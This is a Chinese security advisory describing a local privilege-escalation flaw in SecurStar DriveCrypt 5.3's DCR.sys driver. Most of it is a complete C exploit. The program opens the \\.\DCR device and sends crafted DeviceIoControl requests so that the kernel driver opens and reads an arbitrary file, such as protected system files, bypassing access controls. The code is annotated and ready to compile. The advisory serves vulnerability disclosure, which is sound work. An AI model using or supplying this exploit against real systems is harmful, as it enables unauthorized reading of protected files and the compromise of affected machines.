DriveCrypt "DCR.sys"任意文件读写本地权限提升漏洞

发布日期:2011-01-11
更新日期:2011-01-13

受影响系统:
SecurStar DriveCrypt 5.3
描述:
BUGTRAQ ID: 45750

DriveCrypt是可保护笔记本和台式机上的所有数据的软件。

DriveCrypt的DCR.sys驱动在处理IOCTL请求时存在漏洞:本地攻击者通过向\\.\DCR设备发送特制的DeviceIoControl请求(请求中携带用户态指针和文件路径),可让驱动在内核态代为打开并读写任意文件,绕过文件访问控制,从而完全控制受影响的计算机。

<*来源:Neil Kettle (mu-b@65535.com)*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* drivecrypt-fopen.c
*
* Copyright (c) 2009 by <mu-b@digit-labs.org>
*
* DriveCrypt <= 5.3 local kernel arbitrary file read/write exploit
* by mu-b - Sun 16 Aug 2009
*
* - Tested on: DCR.sys
*
* Compile: MinGW + -lntdll
*
*    - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2009!@$!
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <windows.h>
#include <ddk/ntapi.h>

/* Control code used for every request sent to \\.\DCR below.  Read with the
 * standard Windows CTL_CODE layout it decodes to device type 0x7, function
 * 0xE00, METHOD_BUFFERED and access bits 0 (FILE_ANY_ACCESS) -- i.e. no
 * particular right on the device handle is needed, which is why main() can
 * open the device with FILE_EXECUTE only.  NOTE(review): with METHOD_BUFFERED
 * only the request struct itself is copied by the I/O manager; the pointers
 * embedded in it (file name, handle slot, option block, version buffer) are
 * raw user-mode addresses the driver appears to dereference itself. */
#define DCR_IOCTL   0x00073800

/* Request block for the "enable" action (dAction 0x153, sent from main()).
 * The driver appears to write version information into the user buffer
 * pointed to by lpVerBuffer (main() reads an int at +8 and strings at +12
 * and +19 afterwards).  The field sizes (DWORD next to PUCHAR, 0x20-byte
 * pad) presumably encode a 32-bit layout -- a 64-bit build would need the
 * offsets re-checked against the driver.
 * NOTE(review): the file-scope variable lpRequest is never used; every
 * function below declares a local of the same name that shadows it. */
struct ioctl_enable_req {
  DWORD dAction;
  DWORD dFlag;
  UCHAR pad[0x20];
  PUCHAR lpVerBuffer;
} lpRequest;

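/* Ask the driver to open lpFileName on our behalf (action 63) and return
 * the handle it produces in *hFile.  The Win32 path is turned into an NT
 * path by prefixing "\??\" before it is handed to the driver.
 *
 * hDrv       - open handle to \\.\DCR
 * lpFileName - NUL-terminated Win32 path, e.g. "C:\\boot.ini"
 * hFile      - receives the handle the driver returns; set to NULL first
 * Returns 0 on success and (DWORD)-1 on failure: a NULL argument, a path
 * that does not fit the fixed 256-byte request buffer, or a failed
 * DeviceIoControl (the Win32 error is printed to stderr).
 *
 * The request carries raw user-mode pointers (lpFileName, hFile,
 * lpVerBuffer); the driver appears to dereference them directly, which is
 * the behaviour this PoC relies on.
 */
static DWORD
dcrypt_ZwCreateFile (HANDLE hDrv, const PUCHAR lpFileName, HANDLE *hFile)
{
  struct ioctl_open_req {
    DWORD dAction;
    DWORD dFlag;
    PUCHAR lpFileName;
    UCHAR pad[0x0C];
    HANDLE *hFile;
    UCHAR _pad[0x0C];
    PUCHAR lpVerBuffer;
  } lpRequest;
  UCHAR lpFileBuffer[256], lpVerBuffer[256];
  DWORD dReturnLen = 0;
  BOOL bResult;
  int n;

  if (lpFileName == NULL || hFile == NULL)
    {
      return ((DWORD) -1);
    }

  /* Reject, rather than silently truncate, a path that does not fit:
   * a truncated path would make the driver open a different file. */
  n = snprintf ((char *) lpFileBuffer, sizeof lpFileBuffer,
                "\\??\\%s", (const char *) lpFileName);
  if (n < 0 || (size_t) n >= sizeof lpFileBuffer)
    {
      fprintf (stderr, "* path too long (max %u bytes)\n",
               (unsigned) (sizeof lpFileBuffer - 4 - 1));
      return ((DWORD) -1);
    }

  /* Make the failure case observable to the caller even if the driver
   * never writes the handle slot. */
  *hFile = NULL;
  memset (lpVerBuffer, 0, sizeof lpVerBuffer);

  memset (&lpRequest, 0, sizeof lpRequest);
  lpRequest.dAction = 63;
  lpRequest.dFlag = 0;
  lpRequest.lpFileName = lpFileBuffer;
  lpRequest.hFile = hFile;
  lpRequest.lpVerBuffer = lpVerBuffer;

#ifdef _DEBUG_
  printf ("* opening file...\n");
#endif
  bResult = DeviceIoControl (hDrv, DCR_IOCTL,
                             &lpRequest, sizeof lpRequest,
                             &lpRequest, sizeof lpRequest, &dReturnLen, 0);
  if (!bResult)
    {
      fprintf (stderr, "* DeviceIoControl (open) failed, error %lu\n",
               (unsigned long) GetLastError ());
      return ((DWORD) -1);
    }

#ifdef _DEBUG_
  printf ("** file: %s, handle: %p\n", lpFileBuffer, (void *) *hFile);
  printf ("* done\n");
#endif

  return (0);
}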

/* Issue action 64: have the driver read dLen bytes from hFile, starting at
 * byte offset `offset`, into the caller-supplied buffer lpBuf.
 *
 * hDrv   - open handle to \\.\DCR
 * hFile  - handle previously obtained from dcrypt_ZwCreateFile()
 * lpBuf  - destination buffer, must hold at least dLen bytes
 * dLen   - number of bytes requested
 * offset - file offset; only the low 32 bits are set, the high part is 0
 * Returns hFile unchanged.  If DeviceIoControl fails the process exits with
 * EXIT_FAILURE.  The byte count the driver reports back (dRlen) is only
 * printed in _DEBUG_ builds and is not handed back to the caller.
 */
static HANDLE
dcrypt_ZwReadFile (HANDLE hDrv, HANDLE hFile, PCHAR lpBuf, DWORD dLen, DWORD offset)
{
  /* Inner descriptor the driver reads through the outer request. */
  struct read_opts {
    HANDLE hFile;
    UCHAR pad[0x4];
    LARGE_INTEGER offset;
    PUCHAR lpBuf;
    UCHAR _pad[0x4];
    DWORD dLen;
    DWORD dAction;
    DWORD zero;
    DWORD dRlen;
  } opts;

  /* Outer request: same shape as the open request, but the third field
   * points at the descriptor above instead of a file name. */
  struct ioctl_read_req {
    DWORD dAction;
    DWORD dFlag;
    struct read_opts *lpOpts;
    UCHAR pad[0x10];
    UCHAR _pad[0x0C];
    PUCHAR lpVerBuffer;
  } req;
  UCHAR verbuf[256];
  DWORD returned;
  BOOL ok;

  memset (&opts, 0, sizeof opts);
  opts.hFile = hFile;
  opts.offset.LowPart = offset;
  opts.lpBuf = (PUCHAR) lpBuf;
  opts.dLen = dLen;
  opts.dAction = 0;

  memset (&req, 0, sizeof req);
  req.dAction = 64;
  req.dFlag = 0;
  req.lpOpts = &opts;
  req.lpVerBuffer = verbuf;

#ifdef _DEBUG_
  printf ("* reading from file...\n");
#endif
  ok = DeviceIoControl (hDrv, DCR_IOCTL, &req, sizeof req,
                        &req, sizeof req, &returned, 0);
  if (!ok)
    {
      fprintf (stderr, "* DeviceIoControl failed\n");
      exit (EXIT_FAILURE);
    }

#ifdef _DEBUG_
  printf ("** read: %.*s [%d-bytes]\n", opts.dRlen, lpBuf, opts.dRlen);
  printf ("* done\n");
#endif

  return (hFile);
}

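/* Entry point.
 *
 * Usage: drivecrypt-fopen <path>
 *
 * Opens the DCR control device, sends the "enable" action (0x153) and prints
 * the version data the driver fills in, then asks the driver to open <path>
 * and read its first 256 bytes, which are printed to stdout.  Only the read
 * path is exercised by this listing.  Exit status is EXIT_SUCCESS on success
 * and EXIT_FAILURE on any error.
 */
int
main (int argc, char **argv)
{
  struct ioctl_enable_req req;
  CHAR buf[1024], readbuf[256];
  HANDLE hFile, hReadFile;
  DWORD rlen;
  BOOL result;
  int version;

  printf ("DriveCrypt <= 5.3 local kernel arbitrary file read/write exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2009!@$!\n\n");

  /* argv[1] was previously used unconditionally (NULL without an argument). */
  if (argc < 2 || argv[1] == NULL || argv[1][0] == '\0')
    {
      fprintf (stderr, "usage: %s <file-to-read>\n",
               (argc > 0 && argv[0] != NULL) ? argv[0] : "drivecrypt-fopen");
      return (EXIT_FAILURE);
    }

  /* FILE_EXECUTE is all this PoC asks for on the device; the control
   * code's access bits are zero, so no stronger right is needed. */
  hFile = CreateFileA ("\\\\.\\DCR", FILE_EXECUTE,
                       FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
                       OPEN_EXISTING, 0, NULL);
  if (hFile == INVALID_HANDLE_VALUE)
    {
      fprintf (stderr, "* CreateFileA failed, error %lu\n",
               (unsigned long) GetLastError ());
      return (EXIT_FAILURE);
    }

  /* Zero the version buffer so the %s prints below stay bounded even if the
   * driver writes less than expected. */
  memset (buf, 0, sizeof buf);
  memset (&req, 0, sizeof req);
  req.dAction = 0x153;
  req.dFlag = 0;
  req.lpVerBuffer = (PUCHAR) buf;

  printf ("* enabling driver...\n");
  result = DeviceIoControl (hFile, DCR_IOCTL,
                            &req, sizeof req, &req, sizeof req, &rlen, 0);
  if (!result)
    {
      fprintf (stderr, "* DeviceIoControl failed, error %lu\n",
               (unsigned long) GetLastError ());
      CloseHandle (hFile);
      return (EXIT_FAILURE);
    }
  /* memcpy instead of *(int *)&buf[8] avoids the aliasing/alignment cast;
   * the layout (int at +8, strings at +12 and +19) is whatever the driver
   * writes and is kept exactly as in the original PoC. */
  memcpy (&version, &buf[8], sizeof version);
  printf ("** version: 0x%08X [%s], %s\n", version, &buf[12], &buf[19]);
  printf ("* done\n");

  /* The open result was previously ignored, so a failed open fed an
   * uninitialized handle into the read request. */
  hReadFile = NULL;
  if (dcrypt_ZwCreateFile (hFile, (PUCHAR) argv[1], &hReadFile) != 0
      || hReadFile == NULL)
    {
      fprintf (stderr, "* could not open %s through the driver\n", argv[1]);
      CloseHandle (hFile);
      return (EXIT_FAILURE);
    }

  /* Show what was read.  The read helper does not report a byte count, so
   * the buffer is zero-filled first and printed up to the first NUL
   * (at most 256 bytes). */
  memset (readbuf, 0, sizeof readbuf);
  dcrypt_ZwReadFile (hFile, hReadFile, readbuf, sizeof readbuf, 0);
  printf ("* first %u bytes of %s:\n%.*s\n", (unsigned) sizeof readbuf,
          argv[1], (int) sizeof readbuf, readbuf);

  /* hReadFile is left open: it was created inside the driver and it is not
   * clear from here whether it lives in this process's handle table. */
  CloseHandle (hFile);

  return (EXIT_SUCCESS);
}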

建议:
厂商补丁:

SecurStar
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.securstar.com/

本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载